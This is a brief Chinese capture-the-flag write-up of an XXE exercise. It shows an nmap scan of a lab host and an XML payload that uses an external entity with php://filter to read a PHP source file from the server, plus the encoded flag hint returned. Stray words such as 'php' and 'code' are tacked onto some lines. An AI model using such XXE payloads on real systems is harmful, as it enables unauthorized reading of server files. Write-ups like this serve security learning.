题目已经提示是XXE的专项练习,因此,直接找XXE问题.php
入门html
nmap -sS -A 10.129.10.64
发现HTTP服务、Apache 2.4.27中间件、robots.txt泄漏了目录和文件ide
其中,/xxe/index.php页面经过xml格式提交用户名和密码,因而,此处即为XXE所在位置。
构造以下payload,读取页面源码,得到一不知是flag仍是flag Hint的内容:code
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [<!ENTITY admin SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]> <root><name>&admin;</name><password>123</password></root>
响应:xml
<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->
因而,陷入蒙蔽。。。。等待做者反馈中htm